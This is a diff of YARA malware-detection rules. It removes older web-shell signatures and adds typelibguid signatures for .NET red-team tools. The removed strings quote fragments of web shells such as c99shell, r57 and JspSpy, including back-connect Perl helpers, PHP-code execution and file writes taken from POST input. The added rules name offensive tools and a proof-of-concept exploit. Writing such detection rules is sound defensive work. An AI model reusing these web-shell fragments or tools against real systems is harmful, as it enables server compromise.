-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2853-L2875"
+		description = "Detects VB.NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2140d69e-fb15-50a2-ba85-b7c8293003fb"
+		date = "2020-12-30"
+		modified = "2025-08-15"
+		reference = "https://github.com/mwsrc/njRAT"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L3982-L4000"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2d78db4d45a35d6a78d4288e00a382a0937e3806f0570bd353b88955664a47f6"
-		score = 70
+		logic_hash = "fc54c34e2d908e617781ffe8b4c5538304830cfec317ed2eab4157f72bbbf059"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
-		hash1 = "aa17b71bb93c6789911bd1c9df834ff9"
-		hash2 = "b68bfafc6059fd26732fa07fb6f7f640"
-		hash3 = "40a1f840111996ff7200d18968e42cfe"
-		hash4 = "e0202adff532b28ef1ba206cf95962f2"
-		hash5 = "802f5cae46d394b297482fd0c27cb2fc"
 
 	strings:
-		$s0 = "$this -> addFile($content, $filename);" fullword
-		$s3 = "function addFile($data, $name, $time = 0) {" fullword
-		$s8 = "function unix2DosTime($unixtime = 0) {" fullword
-		$s9 = "foreach($filelist as $filename){" fullword
+		$typelibguid0lo = "5a542c1b-2d36-4c31-b039-26a88d3967da" ascii wide
+		$typelibguid1lo = "6b07082a-9256-42c3-999a-665e9de49f33" ascii wide
+		$typelibguid2lo = "c0a9a70f-63e8-42ca-965d-73a1bc903e62" ascii wide
+		$typelibguid3lo = "70bd11de-7da1-4a89-b459-8daacc930c20" ascii wide
+		$typelibguid4lo = "fc790ee5-163a-40f9-a1e2-9863c290ff8b" ascii wide
+		$typelibguid5lo = "cb3c28b2-2a4f-4114-941c-ce929fec94d3" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_C99_C66_C99_Shadows_Mod_C99Shell
+rule SIGNATURE_BASE_HKTL_NET_GUID_Manager : FILE
 {
 	meta:
-		description = "Web Shell - from files c99.php, c66.php, c99-shadows-mod.php, c99shell.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2876-L2898"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "eef65d2c-ddbc-50c3-a6a0-e7032a55e92d"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/TheWover/Manager"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4002-L4016"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b50a6124f25bbb6fcc9d16d1de26d833a4b968db8e8033e76f3a74695577017e"
-		score = 70
+		logic_hash = "3783108ecfa26ee1a8d0ecfced9e601a41a159777d56a237ae82ad7860b45d5f"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
-		hash1 = "0f5b9238d281bc6ac13406bb24ac2a5b"
-		hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
-		hash3 = "048ccc01b873b40d57ce25a4c56ea717"
 
 	strings:
-		$s2 = "  if (unlink(_FILE_)) {@ob_clean(); echo \"Thanks for using c99shell v.\".$shv"
-		$s3 = "  \"c99sh_backconn.pl\"=>array(\"Using PERL\",\"perl %path %host %port\")," fullword
-		$s4 = "<br><TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#66"
-		$s7 = "   elseif (!$data = c99getsource($bind[\"src\"])) {echo \"Can't download sources"
-		$s8 = "  \"c99sh_datapipe.pl\"=>array(\"Using PERL\",\"perl %path %localport %remotehos"
-		$s9 = "   elseif (!$data = c99getsource($bc[\"src\"])) {echo \"Can't download sources!"
+		$typelibguid0lo = "dda73ee9-0f41-4c09-9cad-8215abd60b33" ascii wide
+		$typelibguid1lo = "6a0f2422-d4d1-4b7e-84ad-56dc0fd2dfc5" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_He1P_Jspspy_Nogfw_Ok_Style_1_Jspspy1
+rule SIGNATURE_BASE_HKTL_NET_GUID_Neo_Confuserex : FILE
 {
 	meta:
-		description = "Web Shell - from files he1p.jsp, JspSpy.jsp, nogfw.jsp, ok.jsp, style.jsp, 1.jsp, JspSpy.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2899-L2922"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d73117a6-4512-5545-a4f4-72d8cf708340"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/XenocodeRCE/neo-ConfuserEx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4018-L4031"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "522ba5f797e33c27fef3ae8d89889c31799073ed3c770a49401f4d42ead04640"
-		score = 70
+		logic_hash = "c916b5443d5df0d58020aec6f3576e3d9cec50fa00b764d86ec7f3a49d0a8d93"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "b330a6c2d49124ef0729539761d6ef0b"
-		hash1 = "d71716df5042880ef84427acee8b121e"
-		hash2 = "344f9073576a066142b2023629539ebd"
-		hash3 = "32dea47d9c13f9000c4c807561341bee"
-		hash4 = "b9744f6876919c46a29ea05b1d95b1c3"
-		hash5 = "3ea688e3439a1f56b16694667938316d"
-		hash6 = "2434a7a07cb47ce25b41d30bc291cacc"
 
 	strings:
-		$s0 = "\"\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>\"+" fullword
-		$s4 = "out.println(\"<h2>File Manager - Current disk &quot;\"+(cr.indexOf(\"/\") == 0?"
-		$s7 = "String execute = f.canExecute() ? \"checked=\\\"checked\\\"\" : \"\";" fullword
-		$s8 = "\"<td nowrap>\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>"
+		$typelibguid0lo = "e98490bb-63e5-492d-b14e-304de928f81a" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_000_403_C5_Config_Myxx_Querydong_Spyjsp2010_Zend
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpallowedtoact : FILE
 {
 	meta:
-		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, config.jsp, myxx.jsp, queryDong.jsp, spyjsp2010.jsp, zend.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2923-L2946"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "13b7f5e0-4d34-533d-a182-b3fe7c93ca43"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/pkb1s/SharpAllowedToAct"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4033-L4046"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7ca710973592718c5455508c5798b3c51dce994d5ebd33aa3a59d1b03c096bdf"
-		score = 70
+		logic_hash = "688c1e5944a96b3cc40deb3c3949da0391e9dbde8c78bcc05a1f48817ae7a0d4"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
-		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
-		hash2 = "8b457934da3821ba58b06a113e0d53d9"
-		hash3 = "d44df8b1543b837e57cc8f25a0a68d92"
-		hash4 = "e0354099bee243702eb11df8d0e046df"
-		hash5 = "90a5ba0c94199269ba33a58bc6a4ad99"
-		hash6 = "655722eaa6c646437c8ae93daac46ae0"
-		hash7 = "591ca89a25f06cf01e4345f98a22845c"
 
 	strings:
-		$s0 = "return new Double(format.format(value)).doubleValue();" fullword
-		$s5 = "File tempF = new File(savePath);" fullword
-		$s9 = "if (tempF.isDirectory()) {" fullword
+		$typelibguid0lo = "dac5448a-4ad1-490a-846a-18e4e3e0cf9a" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_C99_C99Shell_C99_C99Shell
+rule SIGNATURE_BASE_HKTL_NET_GUID_Supersqlinjectionv1 : FILE
 {
 	meta:
-		description = "Web Shell - from files c99.php, c99shell.php, c99.php, c99shell.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2947-L2965"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "247bef0d-7873-51c7-97b8-1be6dfe7708d"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/shack2/SuperSQLInjectionV1"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4048-L4061"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b999b1a8307e228fb97772799369e292fb806d614159f2b2abfc7a71c5bdb225"
-		score = 70
+		logic_hash = "cc4d7ac59d1092c357e0c1ac23eab1618a712cf846a65097c283ef62cfcb0c7d"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
-		hash1 = "d3f38a6dc54a73d304932d9227a739ec"
-		hash2 = "157b4ac3c7ba3a36e546e81e9279eab5"
-		hash3 = "048ccc01b873b40d57ce25a4c56ea717"
 
 	strings:
-		$s2 = "$bindport_pass = \"c99\";" fullword
-		$s5 = " else {echo \"<b>Execution PHP-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr"
+		$typelibguid0lo = "d5688068-fc89-467d-913f-037a785caca7" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_R57Shell127_R57_Ifx_R57_Kartal_R57_Antichat
+rule SIGNATURE_BASE_HKTL_NET_GUID_Adsearch : FILE
 {
 	meta:
-		description = "Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2966-L2987"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "399ea06d-b36a-542b-bccc-8e8f935a35c6"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/tomcarver16/ADSearch"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4063-L4076"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "23887963068f7dd2e4c85b11079276a00786d1a753f22e3b63f01139087a7f4c"
-		score = 70
+		logic_hash = "d925d212b9474078cb3e8694048de22e56de94b33839647c187f3254149bf4ff"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "ae025c886fbe7f9ed159f49593674832"
-		hash1 = "513b7be8bd0595c377283a7c87b44b2e"
-		hash2 = "1d912c55b96e2efe8ca873d6040e3b30"
-		hash3 = "4108f28a9792b50d95f95b9e5314fa1e"
-		hash4 = "3f71175985848ee46cc13282fbed2269"
 
 	strings:
-		$s6 = "$res   = @mysql_query(\"SHOW CREATE TABLE `\".$_POST['mysql_tbl'].\"`\", $d"
-		$s7 = "$sql1 .= $row[1].\"\\r\\n\\r\\n\";" fullword
-		$s8 = "if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }" fullword
-		$s9 = "foreach($values as $k=>$v) {$values[$k] = addslashes($v);}" fullword
+		$typelibguid0lo = "4da5f1b7-8936-4413-91f7-57d6e072b4a7" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_NIX_REMOTE_WEB_SHELL_Nstview_Xxx
+rule SIGNATURE_BASE_HKTL_NET_GUID_Privilege_Escalation_Awesome_Scripts_Suite : FILE
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2988-L3007"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "fa218dfa-4b56-5a62-b149-63394bd0b604"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4078-L4091"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b10e89c6b1851f88a2bbb9116969ea3770366c162b911cb8a2c3a033da3a46bc"
-		score = 70
+		logic_hash = "1fdaa169213f31229973956cba064128ea6d256e339a8e3eb42cc9798ddf007f"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "0b19e9de790cd2f4325f8c24b22af540"
-		hash1 = "4745d510fed4378e4b1730f56f25e569"
-		hash2 = "f3ca29b7999643507081caab926e2e74"
-		hash3 = "46a18979750fa458a04343cf58faa9bd"
 
 	strings:
-		$s3 = "BODY, TD, TR {" fullword
-		$s5 = "$d=str_replace(\"\\\\\",\"/\",$d);" fullword
-		$s6 = "if ($file==\".\" || $file==\"..\") continue;" fullword
+		$typelibguid0lo = "1928358e-a64b-493f-a741-ae8e3d029374" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_000_403_807_A_C5_Config_Css_Dm_He1P_Xxx
+rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2020_1206_POC : FILE
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3008-L3058"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d70472f3-b19f-5097-bd70-99a7e7812ac4"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/ZecOps/CVE-2020-1206-POC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4093-L4108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "46eede3a1af29e344ed5107fc0af4bd13cd1492bff340d61063911bbb474e7b3"
-		score = 70
+		logic_hash = "26511510a1075457c8f133001fac18c8b44c997bd368b9336751bca714ec6ec3"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
-		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
-		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
-		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
-		hash4 = "8b457934da3821ba58b06a113e0d53d9"
-		hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
-		hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
-		hash7 = "14e9688c86b454ed48171a9d4f48ace8"
-		hash8 = "b330a6c2d49124ef0729539761d6ef0b"
-		hash9 = "d71716df5042880ef84427acee8b121e"
-		hash10 = "341298482cf90febebb8616426080d1d"
-		hash11 = "29aebe333d6332f0ebc2258def94d57e"
-		hash12 = "42654af68e5d4ea217e6ece5389eb302"
-		hash13 = "88fc87e7c58249a398efd5ceae636073"
-		hash14 = "4a812678308475c64132a9b56254edbc"
-		hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
-		hash16 = "e0354099bee243702eb11df8d0e046df"
-		hash17 = "344f9073576a066142b2023629539ebd"
-		hash18 = "32dea47d9c13f9000c4c807561341bee"
-		hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
-		hash20 = "655722eaa6c646437c8ae93daac46ae0"
-		hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
-		hash22 = "6acc82544be056580c3a1caaa4999956"
-		hash23 = "6aa32a6392840e161a018f3907a86968"
-		hash24 = "591ca89a25f06cf01e4345f98a22845c"
-		hash25 = "349ec229e3f8eda0f9eb918c74a8bf4c"
-		hash26 = "3ea688e3439a1f56b16694667938316d"
-		hash27 = "ab77e4d1006259d7cbc15884416ca88c"
-		hash28 = "71097537a91fac6b01f46f66ee2d7749"
-		hash29 = "2434a7a07cb47ce25b41d30bc291cacc"
-		hash30 = "7a4b090619ecce6f7bd838fe5c58554b"
 
 	strings:
-		$s3 = "String savePath = request.getParameter(\"savepath\");" fullword
-		$s4 = "URL downUrl = new URL(downFileUrl);" fullword
-		$s5 = "if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))" fullword
-		$s6 = "String downFileUrl = request.getParameter(\"url\");" fullword
-		$s7 = "FileInputStream fInput = new FileInputStream(f);" fullword
-		$s8 = "URLConnection conn = downUrl.openConnection();" fullword
-		$s9 = "sis = request.getInputStream();" fullword
+		$typelibguid0lo = "3523ca04-a12d-4b40-8837-1a1d28ef96de" ascii wide
+		$typelibguid1lo = "d3a2f24a-ddc6-4548-9b3d-470e70dbcaab" ascii wide
+		$typelibguid2lo = "fb30ee05-4a35-45f7-9a0a-829aec7e47d9" ascii wide
 
 	condition:
-		4 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_2_520_Icesword_Job_Ma1
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dinvoke : FILE
 {
 	meta:
-		description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3059-L3079"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f3b0ef47-a92c-5c5d-a9e2-09579fcb438e"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/TheWover/DInvoke"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4110-L4123"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "795eb586310d87a3c6b53117bf2c8cbcfadcb177f5a5129c17fd21f0b64c385c"
-		score = 70
+		logic_hash = "4e7479d36ce78332d2224f16bc2f3059baa418f3035bca8b1ae1e5053dd4d3c3"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "64a3bf9142b045b9062b204db39d4d57"
-		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
-		hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
-		hash3 = "56c005690da2558690c4aa305a31ad37"
-		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
 
 	strings:
-		$s1 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"></head>" fullword
-		$s3 = "<input type=\"hidden\" name=\"_EVENTTARGET\" value=\"\" />" fullword
-		$s8 = "<input type=\"hidden\" name=\"_EVENTARGUMENT\" value=\"\" />" fullword
+		$typelibguid0lo = "b77fdab5-207c-4cdb-b1aa-348505c54229" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_404_Data_In_Jfolder_Jfolder01_Jsp_Suiyue_Warn
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpchisel : FILE
 {
 	meta:
-		description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, suiyue.jsp, warn.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3080-L3104"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3b7e6703-ebe8-5a98-839f-7d0349ab483f"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/shantanu561993/SharpChisel"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4125-L4138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5e0da29499d76539fb1f5cfbe0a00331eeb0bb8fa861f2e2d686130ee4939fac"
-		score = 70
+		logic_hash = "b2efa0f3757bf93a677d1faea14a71d2e63f45de99b7c9e55a951e6c401f6bd8"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "7066f4469c3ec20f4890535b5f299122"
-		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
-		hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
-		hash3 = "8979594423b68489024447474d113894"
-		hash4 = "ec482fc969d182e5440521c913bab9bd"
-		hash5 = "f98d2b33cd777e160d1489afed96de39"
-		hash6 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
-		hash7 = "e9a5280f77537e23da2545306f6a19ad"
 
 	strings:
-		$s0 = "<table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol"
-		$s2 = " KB </td>" fullword
-		$s3 = "<table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\""
-		$s4 = "<!-- <tr align=\"center\"> " fullword
+		$typelibguid0lo = "f5f21e2d-eb7e-4146-a7e1-371fd08d6762" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Phpspy_2005_Full_Phpspy_2005_Lite_Phpspy_2006_PHPSPY
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpscribbles : FILE
 {
 	meta:
-		description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3106-L3126"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "47125b76-9388-5372-8810-d198f623367a"
+		date = "2021-01-21"
+		modified = "2025-08-15"
+		reference = "https://github.com/V1V1/SharpScribbles"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L4140-L4154"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fc47a50c5964574fb9b9caf3fb94041f028998577bf4ccf21884a41fa1876572"
-		score = 70
+		logic_hash = "e4cff3fb3540fa1e189c71584889d07111ccc4a340c78011213819f206631446"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
-		hash1 = "42f211cec8032eb0881e87ebdb3d7224"
-		hash2 = "40a1f840111996ff7200d18968e42cfe"
-		hash3 = "0712e3dc262b4e1f98ed25760b206836"
 
 	strings:
-		$s4 = "http://www.4ngel.net" fullword
-		$s5 = "</a> | <a href=\"?action=phpenv\">PHP" fullword
-		$s8 = "echo $msg=@fwrite($fp,$_POST['filecontent']) ? \"" fullword
-		$s9 = "Codz by Angel" fullword
+		$typelibguid0lo = "aa61a166-31ef-429d-a971-ca654cd18c3b" ascii wide
+		$typelibguid1lo = "0dc1b824-c6e7-4881-8788-35aecb34d227" ascii wide
 
 	condition:
-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
